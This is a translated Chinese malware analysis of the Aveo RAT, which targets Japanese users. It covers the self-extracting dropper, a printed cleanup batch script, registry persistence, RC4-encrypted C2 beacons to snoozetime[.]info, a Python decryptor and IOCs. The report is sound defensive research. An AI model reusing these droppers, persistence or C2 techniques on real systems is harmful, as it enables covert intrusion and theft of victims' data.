Aveo恶意软件分析

Palo Alto Networks 发现了一个名为 Aveo 的恶意软件家族,它针对日语用户开发。Aveo 的名字来自于其二进制文件中的嵌入式调试字符串。Aveo 恶意软件家族与 ForrmerFirstRAT 恶意软件家族有密切的联系,二者都针对日语用户。Aveo 会伪装成 Microsoft Excel 文档,并在执行时抛出诱饵文件。诱饵文档与埼玉工業大学 Ido 实验室的研究有关。执行后,Aveo 可以接收多种命令,这将允许攻击者完全控制感染主机。

部署

Aevo 的样本会伪装成 Microsoft Excel 文档,如下图所示。值得注意的是,malware.exe 只是一个占位符,原文件名未知。

该可执行文件其实是一个 WinRAR 的自解压可执行文件,它会在执行时抛出诱饵文档和 Aveo 木马来运行。下图就是抛出的诱饵文档,在运行之后打开:

这个诱饵文档是关于 Ido 实验室 2016 年研究立项的信息。该文件列出了 16 名参加 CAVE 的名单,包括名字、单位以及邮件地址。这个文档用日语书写,文件名也是日文 CAVE研究会参加者.xls,这些都表明该恶意软件是针对日语用户的。此外,Aveo 和 FormerFirstRAT 家族的相似性将会在稍后讨论,这个讨论将进一步支持该恶意软件是针对日语用户的。

基础设施

Aveo 木马配置了以下域名来进行 HTTP 通信:

snoozetime[.]info

jack.ondo@mail.com 最早在 2015 年 5 月就注册了,自那时起,该邮箱已经和以下三个 IP 地址关联上了:

104.202.173[.]82 107.180.36[.]179 50.63.202[.]38

所有这些 IP 地址都位于美国境内。

从 snoozetime[.]info 的 WHOIS 信息来看,注册邮箱为jack.ondo@mail[.]com,注册名为aygt5ruhrj aygt5ruhrj gerhjrt。根据这两条线索进行拓展:

bluepaint[.]infocoinpack[.]info7b7p[.]infodonkeyhaws[.]infoeuropcubit[.]comjhmiyh.ny@gmail[.]com844148030@qq[.]com

恶意软件分析

在自解压可执行文件运行后,一系列的文件释出到文件系统中,其执行流如下:

当 mshelp32.exe 可执行程序运行时,首先读取setting32.ini 文件,其中包含着诱饵文档的名字。这一信息被用来构建一个批处理脚本,如下:

@echo offcopy "CAVE研究会参加者.xls" "C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls" /Ydel "CAVE研究会参加者.xls" /F /Qdel mshelp32.exe /F /Qdel setting32.ini /F /Qdel "C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe" /F /Qdel %0 /F /Q

该批处理脚本在一个新的进程中执行,在 Aveo 运行、诱饵文档释放后执行清理工作。

Aveo 恶意软件家族

Aveo 恶意软件会在开始运行一个安装程序,该程序会复制自身到以下位置:%APPDATA%\MMC\MMC.exe如果因为某种原因,%APPDATA%\MMC 目录不能被创建,Aveo 将会使用 %TEMP% 来代替 %APPDATA%。恶意软件自身复制完成后,将会在新的进程中以原文件名为参数执行 MMC.exe。当执行时,如果提供了这单个参数,恶意软件将会删除掉制定路径内的文件。安装完成后,Aveo 将会提取以下受害人信息通过 HTTP 传到远程控制服务器上:

Unique victim hashIP Address Microsoft Windows version Username ANSI code page identifier

这个信息被送到 snoozetime[.]info上,像下面的 HTTP 请求样例:

GET /index.php?id=35467&1=ySxlp03YGm0-&2=yiFi6hjbFHf9UtL44RPQ&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g-- HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)Host: snoozetime[.]infoCache-Control: no-cache

恶意软件使用了 RC4 来对数据进行加密,使用 hello作为密钥。如下图所示,Aveo 和 FormerFirstRAT 的加密部分几乎是相同的,只s是算法和密钥变了。

可以通过以下代码来解密 HTTP 中传输的数据:

import base64from binascii import *from struct import *from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt CALG_RC4 = 0x6801CALG_MD5 = 0x8003def decrypt(data): md5_hasher = CryptCreateHash(CALG_MD5) CryptHashData(md5_hasher, 'hello') generated_key = CryptDeriveKey(md5_hasher, CALG_RC4) decrypted_data = CryptDecrypt(generated_key, data) return decrypted_datafor a in 'index.php?id=35467&1=niBo9x/bFG4-&2=yi9i6hjbAmD5TNPu5A--&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g--'.split("&")[1:]: k,v = a.split("=") decrypted = decrypt(base64.b64decode(v.replace("-","="))) print "[+] Parameter {} Decrypted: {}".format(k, decrypted)

运行以上代码会产生以下结果:

[+] Parameter 1 Decrypted: e8836687[+] Parameter 2 Decrypted: 172.16.95.184[+] Parameter 4 Decrypted: 6.1.7601.2.1[+] Parameter 5 Decrypted: Josh Grunzweig[+] Parameter 6 Decrypted: 1252

在得到受害者信息后,恶意软件会按照预期返回 OK。之后 Aveo 将会产生一个新的线程来负责处理 C&C 服务器的命令,以及请求产生的交互式 Shell。Aveo 对注册表进行以下设置,以指向恶意软件的路径,从而保证重新启动后恶意软件仍然可以持久工作:HKCU\software\microsoft\windows\currentversion\run\msnetbridge然后命令处理程序进入轮询等待,Aveo 会从 C&C 服务器接收命令。虽然 Aveo 在等待响应,它也会执行随机延迟,延迟时间在 0 到 3276 毫秒之间。如果 C&C 服务器返回 toyota,会将间隔设置为 60 秒。Aveo 可以接收以下命令:

1.执行交互 Shell 命令 2.获取文件属性 3.写入文件 4.读取文件 5.驱动器列表 6.对路径执行 DIR 命令

以下请求显示了 C&C 服务器发送 ipconfig 命令到 Aveo 的过程:

C&C 请求

GET /index.php?id=35468&1=niBo9x/bFG4- HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)Host: snoozetime[.]infoCache-Control: no-cacheHTTP/1.0 200 OKContent-Type: text/html; charset=utf-8Content-Length: 11Server: Werkzeug/0.11.10 Python/2.7.5Date: Wed, 10 Aug 2016 16:00:11 GMT\xca89\xb4J\x82B?\xa5\x05\xe8[Decrypted] 1 ipconfig

Aveo 响应

POST /index.php?id=35469&1=niBo9x/bFG4- HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)Host: snoozetime[.]infoContent-Length: 1006Cache-Control: no-cache\xca\x38\x39\xb4\x4a\x82\x42\x3f\xa5\x05\xe8\xdb\xda\x74\x8b\x79\x39\x46\xf2\x42\x1f\xcd\x39\xf3\x65\x1d\xda\x49\x40\x6c\x5e\x6e\xab\x79\xc2\x44\xc3\xb0\x12\xfd\xe2\x84\x67\x0d\xa5\xd3\x50\x2d\x1c\x31\x4a\x9e\xcb\x3d\x08\xe6\x1b\x04\x85\xbf\x11\x0e\x96\x63\xcf\x71\xfe\xe4\x97\x2a\xdc\x12\x23\x4d\xcb\x0f\x93\x30\xbc\xa0\xc8\x4e\x4e\xd8\xdb\x33\xa2\xbe\xff\x5e\x89\x22\xb9\x16\xd1\xf0\x60\x71\x64\x7a\x10\xb8\x78\x76\xe5\x08\x90\x46\x30\xa3\xe2\x4e\xdc\x98\x11\x27\x62\x38\x00\xb4\x54\x6d\xd7\x5b\x19\x5f\x19\xb8\xd1\xf5\xc1\x9b\x97\xda\x84\x2c\xdd\x2d\x97\x0a\x69\x51\xd9\x31\x77\x4a\xe2\x7f\x5e\xc5\xaf\x02\x3c\x69\x9c\x5f\x94\x3e\x0c\x25\xce\x63\xa9\x43\xff\x34\x25\x42\x95\xa9\x1f\xaa\xdf\x2b\xa7\xb1\xc0\x3[Truncated][Decrypted]1 ipconfigWindows IP ConfigurationEthernet adapter Bluetooth Network Connection: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : [Truncated]

结论

Aveo 与 FormerFirstRAT 在多个特征上都是一致的,包括加密模块、代码重用和 C&C 功能。正如前面讨论的 FormerFirstRAT 样本,这个恶意软件家族看起来也是针对日语用户。使用自解压文件的 WinRAR 释放诱饵文档和 Aveo 的恶意软件副本以及清理脚本。Palo Alto Networks 的客户已经免受以下威胁:

1.AutoFocus 已经对这种威胁创建了跟踪和监控 2.WildFire 归类 Aveo 到恶意程序 3.C&C 域名列入 Threat Prevention 拦截黑名单

IOC

SHA256 哈希

9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2 8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d

C&C 域名

snoozetime[.]info

注册表键值

HKCU\software\microsoft\windows\currentversion\run\msnetbridge

文件路径

%APPDATA%\MMC\MMC.exe%TEMP%\MMC\MMC.exe

*参考文章来源:researchcenter,由Avenger编译,转载请注明来自FreeBuf.COM。

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2016-12-04

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏信安之路

网络安全渗透测试

针对网络的渗透测试项目一般包括:信息收集、端口扫描、指纹识别、漏洞扫描、绘制网络拓扑、识别代理、记录结果等。下面就一一介绍。

1750
来自专栏Seebug漏洞平台

披着狼皮的羊——寻找惠普多款打印机中的RCE漏洞

原文:《A Sheep in Wolf’s Clothing – Finding RCE in HP’s Printer Fleet》

3678
来自专栏Eugene's Blog

黑客常用的扫描器盒子分类目录文章标签友情链接联系我们

2489
来自专栏FreeBuf

一次入侵应急响应分析

本文是前段时间处理某用户被黑的分析总结,用户被黑的表现是使用爬虫访问用户网站的首页时会出现博彩关键字,而使用正常浏览器访问时无相关的博彩关键词。这是典型的黑帽S...

1592
来自专栏有趣的Python

程序员装机必备爆款软件推荐与配置(windows版)

做机也要做一只全能的机哦 值此新年来临之即,面对两百多个G的c盘。忍痛割爱将电脑系统重装,版本为(win10:1079)之后的所有电脑环境更新,专业软件安装均会...

4253
来自专栏黑泽君的专栏

day51_BOS项目_03

将上面的js文件引入所需要的jsp页面中,本例以index.jsp为例 /bos19/WebContent/WEB-INF/pages/common/inde...

741
来自专栏Seebug漏洞平台

披着狼皮的羊——寻找惠普多款打印机中的RCE漏洞

原文:https://foxglovesecurity.com/2017/11/20/a-sheep-in-wolfs-clothing-finding-rce...

973
来自专栏FreeBuf

高效的DDoS攻击探测与分析工具 – FastNetMon

FastNetMon这是一个基于多种抓包引擎(NetFlow, IPFIX, sFLOW, netmap, PF_RING, PCAP)的DoS/DDoS攻击高...

4979
来自专栏黑白安全

CMS漏洞之ZZCMS v8.2最新SQL注入漏洞

CMS漏洞之ZZCMS v8.2最新SQL注入漏洞 时间概述 近期在一直都在审核CMS漏洞,连续数日,一无所获,甚是无聊,略有些许焦躁。 暮然回首,桌角横...

1773
来自专栏落花落雨不落叶

史上最“脑残”的“抢火车票”程序(node.js版)

4016

扫码关注云+社区